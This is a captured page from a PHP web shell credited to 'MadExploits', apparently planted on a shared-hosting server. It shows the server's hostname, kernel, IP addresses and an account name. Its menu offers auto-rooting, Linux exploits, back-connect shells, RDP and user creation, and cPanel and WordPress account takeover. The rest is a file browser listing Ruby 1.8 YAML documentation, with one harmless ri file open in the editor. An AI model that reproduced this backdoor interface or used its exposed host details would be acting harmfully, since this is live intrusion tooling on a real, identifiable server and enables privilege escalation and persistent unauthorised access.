Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.221
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
YAML /
[ HOME SHELL ]
Name
Size
Permission
Action
BaseEmitter
[ DIR ]
drwxr-xr-x
BaseNode
[ DIR ]
drwxr-xr-x
DBM
[ DIR ]
drwxr-xr-x
DomainType
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Mapping
[ DIR ]
drwxr-xr-x
Object
[ DIR ]
drwxr-xr-x
Omap
[ DIR ]
drwxr-xr-x
Pairs
[ DIR ]
drwxr-xr-x
ParseError
[ DIR ]
drwxr-xr-x
PrivateType
[ DIR ]
drwxr-xr-x
Sequence
[ DIR ]
drwxr-xr-x
Set
[ DIR ]
drwxr-xr-x
SpecialHash
[ DIR ]
drwxr-xr-x
Store
[ DIR ]
drwxr-xr-x
Stream
[ DIR ]
drwxr-xr-x
Syck
[ DIR ]
drwxr-xr-x
TypeError
[ DIR ]
drwxr-xr-x
YPath
[ DIR ]
drwxr-xr-x
YamlNode
[ DIR ]
drwxr-xr-x
add_builtin_type-c.yaml
287
B
-rw-r--r--
add_domain_type-c.yaml
297
B
-rw-r--r--
add_private_type-c.yaml
273
B
-rw-r--r--
add_ruby_type-c.yaml
281
B
-rw-r--r--
cdesc-YAML.yaml
9.66
KB
-rw-r--r--
detect_implicit-c.yaml
249
B
-rw-r--r--
dump-c.yaml
652
B
-rw-r--r--
dump_stream-c.yaml
443
B
-rw-r--r--
each_document-c.yaml
537
B
-rw-r--r--
each_node-c.yaml
568
B
-rw-r--r--
emitter-c.yaml
232
B
-rw-r--r--
escape-c.yaml
263
B
-rw-r--r--
generic_parser-c.yaml
245
B
-rw-r--r--
load-c.yaml
565
B
-rw-r--r--
load_documents-c.yaml
543
B
-rw-r--r--
load_file-c.yaml
399
B
-rw-r--r--
load_stream-c.yaml
338
B
-rw-r--r--
make_stream-c.yaml
248
B
-rw-r--r--
object_maker-c.yaml
250
B
-rw-r--r--
parse-c.yaml
1.21
KB
-rw-r--r--
parse_documents-c.yaml
586
B
-rw-r--r--
parse_file-c.yaml
927
B
-rw-r--r--
parser-c.yaml
229
B
-rw-r--r--
quick_emit-c.yaml
258
B
-rw-r--r--
read_type_class-c.yaml
334
B
-rw-r--r--
resolver-c.yaml
233
B
-rw-r--r--
tag_class-c.yaml
1.28
KB
-rw-r--r--
tagged_classes-c.yaml
513
B
-rw-r--r--
tagurize-c.yaml
239
B
-rw-r--r--
transfer-c.yaml
259
B
-rw-r--r--
try_implicit-c.yaml
259
B
-rw-r--r--
unescape-c.yaml
242
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag_class-c.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: "Associates a taguri <em>tag</em> with a Ruby class <em>cls</em>. The taguri is used to give types to classes when loading YAML. Taguris are of the form:" - !ruby/struct:SM::Flow::VERB body: " tag:authorityName,date:specific\n" - !ruby/struct:SM::Flow::P body: The <tt>authorityName</tt> is a domain name or email address. The <tt>date</tt> is the date the type was issued in YYYY or YYYY-MM or YYYY-MM-DD format. The <tt>specific</tt> is a name for the type being added. - !ruby/struct:SM::Flow::P body: "For example, built-in YAML types have 'yaml.org' as the <tt>authorityName</tt> and '2002' as the <tt>date</tt>. The <tt>specific</tt> is simply the name of the type:" - !ruby/struct:SM::Flow::VERB body: " tag:yaml.org,2002:int\n tag:yaml.org,2002:float\n tag:yaml.org,2002:timestamp\n" - !ruby/struct:SM::Flow::P body: The domain must be owned by you on the <tt>date</tt> declared. If you don't own any domains on the date you declare the type, you can simply use an e-mail address. - !ruby/struct:SM::Flow::VERB body: " tag:why@ruby-lang.org,2004:notes/personal\n" full_name: YAML::tag_class is_singleton: true name: tag_class params: ( tag, cls ) visibility: public
Close